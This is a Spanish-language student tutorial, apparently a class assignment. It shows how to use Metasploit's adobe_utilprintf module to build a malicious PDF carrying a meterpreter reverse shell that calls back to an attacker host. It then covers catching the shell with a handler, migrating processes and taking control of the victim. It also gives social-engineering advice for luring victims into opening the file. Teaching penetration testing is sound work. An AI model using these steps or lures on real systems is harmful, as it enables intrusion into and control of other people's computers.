Client Side Attack (Ataque del lado del cliente)

Objetivo

Tener acceso y tomar control de una máquina víctima explotando una vulnerabilidad de una aplicación que será ejecutada por el usuario víctima.

En que consiste el ataque del lado del cliente

Esta técnica consiste en crear e infectar un archivo malicioso con el fin de obtener acceso a la computadora victima ya sea por red local o por la web. El archivo malicioso lo crearemos utilizando la herramienta metasploit que viene incorporada en BACKTRACK 5

Realizando ataque del lado del cliente
Ahora procederemos a realizar el ataque:
Tenemos nuestra maquina victima con Windows XP el cual tiene instalado el adobe reader 8, y nuestra máquina atacante el cual tiene instalado el BACKTRACK 5

Una vez que entremos a nuestro sistema BACKTRACK abrimos una consola de comandos y levantamos la herramienta Metaspolit escribiendo la siguiente instrucción:

msfconsole

Una vez cargado el Metaspolit, procederemos a ejecutar las siguientes líneas de comando.

//Luego que se haya ejecutado metasploit, vamos a crear para nuestro archivo malicioso, que en este caso es para nuestro archivo PDF. utilizaremos los siguientes comandos//

msf> use exploit/windows/fileformat/adobe_utilprintf

// acontinuación definimos el nombre como vamos a llamar nuestro PDF malicioso //

msfexploit(adobe_utilprintf) > set FILENAME juicio_EL_UNIVERSO.pdf

//ponemos este nombre ya que es la noticia del momento y es mas fácil que nuestra victima abra el archivo//

FILENAME =>juicio_EL_UNIVERSO.pdf

// Ahora definimos y cargar el ataque reverso en el PDF que vamos a realizar.//

msfexploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp

//vamos a setear el host de la máquina atacante, ósea en este caso nuestra máquina//

msfexploit(adobe_utilprintf) > set LHOST 192.168.200.6
LHOST =>192.168.200.6

//luego seteamos nuestro puerto ósea de la máquina atacante, por donde se va a escuchar el ataque o a realizar el ataque//

msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT =>4455
msf exploit(adobe_utilprintf) > show options

//luego ejecutamos el exploit para crear nuestro archivo malicioso.//

msf exploit(adobe_utilprintf) > exploit

Aquí vemos que se ha creado nuestro PDF juicio EL UNIVERSO.pdf que se genera en esa ruta, nosotros debemos tomar esta ruta y por cualquier medio sea por E-mail o dispositivos movil de tal forma hacer que ejecuten nuestro archivo malicioso en la máquina víctima con estrategias de ingeniería social.

//+Escuchando la conexion
Utilizamos los siguientes comandos//

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

//Luego Configuramos nuestro puerto por el cual vamos a recibir la conexion, los puertos pueden cambiar según el exploit que utilicemos//

msf exploit(handler) > set LPORT 4455
LPORT => 4455

// Y configuramos nuestro Host de nuestra maquina atacante//

msf exploit(handler) > set LHOST 192.168.200.6
LHOST => 192.168.200.6

// Y aqui iniciamos nuestro ataque//

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

En nuestra máquina víctima se descarga el archivo malicioso

//Aquí tenemos ya descargado nuestro archivo malicioso en la máquina de nuestra víctima y procederemos a ejecutarlo.
La victima va intentar abrir el archivo pero en ese momento se ejecutara nuestro código malicioso que nos va a permitir a exceder al sistema operativo de la víctima, y por otro lado en nuestra maquina atacante va a estar a la espera de pescar a una víctima.//

//Hemos accedido a la maquina víctima, lo primero que debemos hacer es saber que sistema operativo hemos accedido, con el siguiente comando://

meterpreter > sysinfo

//luego conocemos que servicios están levantados o ejecutándose en la maquina victima con el siguiente comando://

meterpreter > ps

//Luego de verificar los procesos nos migraremos a un proceso que no se finalice tan fácilmente puesto que al momento que cierren el adobe reader perderemos la conexión, en este caso nos migraremos al proceso explore.exe tomando el Id proceso del mismo para tener más tiempo para indagar, nos migramos de proceso con el siguiente comando://

meterpreter > migrate 1476

// ahora vamos a proceder a levantar una Shell que nos permitirá a acceder al sistema de la maquina víctima, para hacer lo que nosotros queramos. control total.//

//hemos accedido al disco C de la maquina víctima y hacer lo que queramos.
y por últimos crearemos una carpeta en la máquina víctima, con el siguiente comando de DOS mkdir//

A continuación te agregamos un video para que te guies:

http://www.youtube.com/watch?v=_4zPafSz7ow

INTEGRANTES:

VICTOR TAMA.
JESSICA QUIMI.
LYZANDRO FIERRO.
DANIEL CASTILLO.
DOLORES TOMALA.
WALTER VERDESOTO.